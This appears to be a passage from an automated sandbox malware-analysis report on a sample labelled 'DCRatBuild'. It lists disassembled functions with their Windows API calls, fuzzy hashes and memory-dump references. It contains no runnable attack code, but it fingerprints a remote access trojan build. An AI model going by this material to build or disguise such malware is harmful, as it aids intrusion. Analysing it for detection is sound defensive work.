                                      • Opcode ID: 9272cbcc750996bf1cd2bc827903451af776158a300cd9b5458550e77b0e8146
                                      • Instruction ID: 842a792a0c8b0adfa84105dc646423201a05f77b0ae8df6b20d5877da48f32ff
                                      • Opcode Fuzzy Hash: 9272cbcc750996bf1cd2bc827903451af776158a300cd9b5458550e77b0e8146
                                      • Instruction Fuzzy Hash: 06D0C9763C8306BFEA114B74CC06F2B7BA5A755BA6F208524F356E90E0CA709024B629
                                      Function 00F0ACF5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetVersionExW.KERNEL32(?), ref: 00F0AD1A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Version
                                      • String ID:
                                      • API String ID: 1889659487-0
                                      • Opcode ID: 9abea45435a7b738d32730074ce845caa6f3047a18255060edf8e35503336ff0
                                      • Instruction ID: a8dbaa66a3d64894e61c074ad1cebb051e0e83fca76eb496e9110460cdf83b3c
                                      • Opcode Fuzzy Hash: 9abea45435a7b738d32730074ce845caa6f3047a18255060edf8e35503336ff0
                                      • Instruction Fuzzy Hash: AAF06DB4D0030C8BCB28CB18ED416E977B5F759321F2006A5EE1443394D770AD45AE51
                                      Function 00F1F063 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0001F070,00F1EAC5), ref: 00F1F068
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled
                                      • String ID:
                                      • API String ID: 3192549508-0
                                      • Opcode ID: 1266bc0278d6cdf422ba1715689298cecae820e13b43de9d94143664ab951bd7
                                      • Instruction ID: 0c90181a75407bc18b5919fcd7a68b5948d2831302cf4fad2a566b209f062a9d
                                      • Opcode Fuzzy Hash: 1266bc0278d6cdf422ba1715689298cecae820e13b43de9d94143664ab951bd7
                                      • Instruction Fuzzy Hash:
                                      Function 00F2B710 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: HeapProcess
                                      • String ID:
                                      • API String ID: 54951025-0
                                      • Opcode ID: b68c98a75ae2e888b917dedad50cd0dbd56f9d259182bb188b1eba87fdf3395a
                                      • Instruction ID: 36f764dcfebaf537aa6d58b0f47236ca0238f660e0c23505999444d690591e99
                                      • Opcode Fuzzy Hash: b68c98a75ae2e888b917dedad50cd0dbd56f9d259182bb188b1eba87fdf3395a
                                      • Instruction Fuzzy Hash: 53A011B8A00208CB8300CF32AA0820A3AAABA002A03088228A00AC2020EA288020AF00
                                      Function 00F0DA98 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 236COMMON
                                      Download Yara Rule
                                      APIs
                                      • _swprintf.LIBCMT ref: 00F0DABE
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                        • Part of subcall function 00F11596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00F40EE8,00000200,00F0D202,00000000,?,00000050,00F40EE8), ref: 00F115B3
                                      • _strlen.LIBCMT ref: 00F0DADF
                                      • SetDlgItemTextW.USER32(?,00F3E154,?), ref: 00F0DB3F
                                      • GetWindowRect.USER32(?,?), ref: 00F0DB79
                                      • GetClientRect.USER32(?,?), ref: 00F0DB85
                                      • GetWindowLongW.USER32(?,000000F0), ref: 00F0DC25
                                      • GetWindowRect.USER32(?,?), ref: 00F0DC52
                                      • SetWindowTextW.USER32(?,?), ref: 00F0DC95
                                      • GetSystemMetrics.USER32(00000008), ref: 00F0DC9D
                                      • GetWindow.USER32(?,00000005), ref: 00F0DCA8
                                      • GetWindowRect.USER32(00000000,?), ref: 00F0DCD5
                                      • GetWindow.USER32(00000000,00000002), ref: 00F0DD47
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                      • String ID: I=u$$%s:$CAPTION$d
                                      • API String ID: 2407758923-1991495195
                                      • Opcode ID: 85ba0a06ccbad13adb42b650ff8d1ce592794ee69df7ad8e541e95af23f33838
                                      • Instruction ID: f01dc9d287e4cd3b74ae05a8a50e277a0da6ebf6c831d6a91969071f3dea16a1
                                      • Opcode Fuzzy Hash: 85ba0a06ccbad13adb42b650ff8d1ce592794ee69df7ad8e541e95af23f33838
                                      • Instruction Fuzzy Hash: E281D171508305AFD710DFA8CC88E6BBBE9EBC9714F04491DFA94E3290D674E905EB52
                                      Function 00F2C233 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • ___free_lconv_mon.LIBCMT ref: 00F2C277
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE2F
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE41
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE53
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE65
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE77
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE89
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BE9B
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEAD
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEBF
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BED1
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEE3
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BEF5
                                        • Part of subcall function 00F2BE12: _free.LIBCMT ref: 00F2BF07
                                      • _free.LIBCMT ref: 00F2C26C
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F2C28E
                                      • _free.LIBCMT ref: 00F2C2A3
                                      • _free.LIBCMT ref: 00F2C2AE
                                      • _free.LIBCMT ref: 00F2C2D0
                                      • _free.LIBCMT ref: 00F2C2E3
                                      • _free.LIBCMT ref: 00F2C2F1
                                      • _free.LIBCMT ref: 00F2C2FC
                                      • _free.LIBCMT ref: 00F2C334
                                      • _free.LIBCMT ref: 00F2C33B
                                      • _free.LIBCMT ref: 00F2C358
                                      • _free.LIBCMT ref: 00F2C370
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                      • String ID:
                                      • API String ID: 161543041-0
                                      • Opcode ID: e7b2c2661b80c4f21447f1b3ee7c377b0720c6c7a79b5a1b9cd952728cf5309b
                                      • Instruction ID: e1f5739cf4704c1345ee8701fbc8b3bfd478f59cc04a1fa93c75162b847601b7
                                      • Opcode Fuzzy Hash: e7b2c2661b80c4f21447f1b3ee7c377b0720c6c7a79b5a1b9cd952728cf5309b
                                      • Instruction Fuzzy Hash: 24317031900625DFEB20EAB9FD45B5A73E9FF00360F148869E449DB591DF35AC41EB90
                                      Function 00F1CD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindow.USER32(?,00000005), ref: 00F1CD51
                                      • GetClassNameW.USER32(00000000,?,00000800), ref: 00F1CD7D
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      • GetWindowLongW.USER32(00000000,000000F0), ref: 00F1CD99
                                      • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00F1CDB0
                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 00F1CDC4
                                      • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00F1CDED
                                      • DeleteObject.GDI32(00000000), ref: 00F1CDF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00F1CDFD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                      • String ID: STATIC
                                      • API String ID: 3820355801-1882779555
                                      • Opcode ID: 23b16df96186c2d68b74d1c8043ea5ab0b304332482398a76c146bc463f78002
                                      • Instruction ID: 14e97b89e18370a565fa668cfa746095186337a23c40547c242bedd142833e4a
                                      • Opcode Fuzzy Hash: 23b16df96186c2d68b74d1c8043ea5ab0b304332482398a76c146bc463f78002
                                      • Instruction Fuzzy Hash: 29110A729887147BE2216B70AC4AFDF765CFF55B51F004420FA62A10D2CAA48986B6E5
                                      Function 00F28EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 00F28EC5
                                        • Part of subcall function 00F284DE: RtlFreeHeap.NTDLL(00000000,00000000,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958), ref: 00F284F4
                                        • Part of subcall function 00F284DE: GetLastError.KERNEL32(00F33958,?,00F2BFA7,00F33958,00000000,00F33958,00000000,?,00F2BFCE,00F33958,00000007,00F33958,?,00F2C3CB,00F33958,00F33958), ref: 00F28506
                                      • _free.LIBCMT ref: 00F28ED1
                                      • _free.LIBCMT ref: 00F28EDC
                                      • _free.LIBCMT ref: 00F28EE7
                                      • _free.LIBCMT ref: 00F28EF2
                                      • _free.LIBCMT ref: 00F28EFD
                                      • _free.LIBCMT ref: 00F28F08
                                      • _free.LIBCMT ref: 00F28F13
                                      • _free.LIBCMT ref: 00F28F1E
                                      • _free.LIBCMT ref: 00F28F2C
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: _free$ErrorFreeHeapLast
                                      • String ID:
                                      • API String ID: 776569668-0
                                      • Opcode ID: b110bb066a500bf50f7c96467a99f5865f43c0200f1342ed1949e502a8c902a3
                                      • Instruction ID: b102406c1fda998e493011aab8d86ee31296d64f4ddce7ac907c6f0578213ae8
                                      • Opcode Fuzzy Hash: b110bb066a500bf50f7c96467a99f5865f43c0200f1342ed1949e502a8c902a3
                                      • Instruction Fuzzy Hash: F511A47650211DAFCB11FF94EC42CDA3BA5FF04390B5140E5BA098B626DA35DA52AB80
                                      Function 00F02162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: ;%u$x%u$xc%u
                                      • API String ID: 0-2277559157
                                      • Opcode ID: 6e042d4506dfd7da4d69a6ca186d5b3e3ad81ca48cbb4aaed09e29b77da11155
                                      • Instruction ID: b80ed04839493091023ff5435603987359662c92c6fea493d8811f5d1d781f10
                                      • Opcode Fuzzy Hash: 6e042d4506dfd7da4d69a6ca186d5b3e3ad81ca48cbb4aaed09e29b77da11155
                                      • Instruction Fuzzy Hash: 33F11871A042405BDB65DF388C99BFE779A6F90310F08056DF9858B2C3DA699848F7B2
                                      Function 00F1ACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00F0130B: GetDlgItem.USER32(00000000,00003021), ref: 00F0134F
                                        • Part of subcall function 00F0130B: SetWindowTextW.USER32(00000000,00F335B4), ref: 00F01365
                                      • EndDialog.USER32(?,00000001), ref: 00F1AD20
                                      • SendMessageW.USER32(?,00000080,00000001,?), ref: 00F1AD47
                                      • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00F1AD60
                                      • SetWindowTextW.USER32(?,?), ref: 00F1AD71
                                      • GetDlgItem.USER32(?,00000065), ref: 00F1AD7A
                                      • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00F1AD8E
                                      • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00F1ADA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: MessageSend$Item$TextWindow$Dialog
                                      • String ID: LICENSEDLG
                                      • API String ID: 3214253823-2177901306
                                      • Opcode ID: c3d599f76dc2f3b5bef70076d202698e2355833b87b520e35cdcfe4d34374dc1
                                      • Instruction ID: 4e78fad12ffda96bb5d07d20406f761b834306a2ae74bdeebae77b5aa9b7ae1d
                                      • Opcode Fuzzy Hash: c3d599f76dc2f3b5bef70076d202698e2355833b87b520e35cdcfe4d34374dc1
                                      • Instruction Fuzzy Hash: 7B21D332645609BBD2255F21FC49EBB3B6CFB47B56F010008F604E24A0CBA6AA41F632
                                      Function 00F09443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 00F09448
                                      • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 00F0946B
                                      • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 00F0948A
                                        • Part of subcall function 00F117AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,00F0BB05,00000000,.exe,?,?,00000800,?,?,00F185DF,?), ref: 00F117C2
                                      • _swprintf.LIBCMT ref: 00F09526
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • MoveFileW.KERNEL32(?,?), ref: 00F09595
                                      • MoveFileW.KERNEL32(?,?), ref: 00F095D5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                                      • String ID: rtmp%d
                                      • API String ID: 2111052971-3303766350
                                      • Opcode ID: d31b0e2a4e8d5f99e34e52e6f8658889ba8b4fd5fb7b09f743dd8d12e7198133
                                      • Instruction ID: 6262a8c839e514a9a7c917d796c8a3f72371981ee8d7d66cfb1ebe22d1cb21fa
                                      • Opcode Fuzzy Hash: d31b0e2a4e8d5f99e34e52e6f8658889ba8b4fd5fb7b09f743dd8d12e7198133
                                      • Instruction Fuzzy Hash: 83414F7190425866DF20EB60CC85AEF737CAF55390F0444E5B649E3092FBB89B89FB64
                                      Function 00F10A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __aulldiv.LIBCMT ref: 00F10A9D
                                        • Part of subcall function 00F0ACF5: GetVersionExW.KERNEL32(?), ref: 00F0AD1A
                                      • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F10AC0
                                      • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 00F10AD2
                                      • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00F10AE3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10AF3
                                      • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F10B03
                                      • FileTimeToSystemTime.KERNEL32(?,?), ref: 00F10B3D
                                      • __aullrem.LIBCMT ref: 00F10BCB
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                                      • String ID:
                                      • API String ID: 1247370737-0
                                      • Opcode ID: 1e9f93d9157e70ba080a78504f6ed306ba87fc29bced6c748364fb05367d2515
                                      • Instruction ID: 899ec51248b2e1041f625aabb74a9e7a33a49d1a6e9d88b0c7d794c4cd1c40e4
                                      • Opcode Fuzzy Hash: 1e9f93d9157e70ba080a78504f6ed306ba87fc29bced6c748364fb05367d2515
                                      • Instruction Fuzzy Hash: 404128B1408306AFC314DF64C8809ABFBF9FF88715F004A2EF59692650E779E588DB52
                                      Function 00F2EE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00F2F5A2,?,00000000,?,00000000,00000000), ref: 00F2EE6F
                                      • __fassign.LIBCMT ref: 00F2EEEA
                                      • __fassign.LIBCMT ref: 00F2EF05
                                      • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00F2EF2B
                                      • WriteFile.KERNEL32(?,?,00000000,00F2F5A2,00000000,?,?,?,?,?,?,?,?,?,00F2F5A2,?), ref: 00F2EF4A
                                      • WriteFile.KERNEL32(?,?,00000001,00F2F5A2,00000000,?,?,?,?,?,?,?,?,?,00F2F5A2,?), ref: 00F2EF83
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334926580.0000000000F62000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_f00000_DCRatBuild.jbxd
                                      Similarity
                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                      • String ID:
                                      • API String ID: 1324828854-0
                                      • Opcode ID: efe301dd28101e44ab8f59508b1ad779a596a2861ccfaf0a427786ed6a16a67c
                                      • Instruction ID: 042478aff01861d13b7c0cf91c748ec6e1c289eeea7870670f89b9f579ad6c1d
                                      • Opcode Fuzzy Hash: efe301dd28101e44ab8f59508b1ad779a596a2861ccfaf0a427786ed6a16a67c
                                      • Instruction Fuzzy Hash: 0751E5B1E002199FCB10CFA8ED85AEEBBF9FF09310F24451AE955E7291D770A941DB60
                                      Function 00F1C534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000800,?), ref: 00F1C54A
                                      • _swprintf.LIBCMT ref: 00F1C57E
                                        • Part of subcall function 00F0400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00F0401D
                                      • SetDlgItemTextW.USER32(?,00000066,00F4946A), ref: 00F1C59E
                                      • _wcschr.LIBVCRUNTIME ref: 00F1C5D1
                                      • EndDialog.USER32(?,00000001), ref: 00F1C6B2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1334797000.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                      • Associated: 00000003.00000002.1334778232.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334838543.0000000000F33000.00000002.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F3E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F44000.00000004.00000001.01000000.00000007.sdmpDownload File
                                      • Associated: 00000003.00000002.1334857672.0000000000F61000.00000004.00000001.01000000.00000007.sdmpDownload File
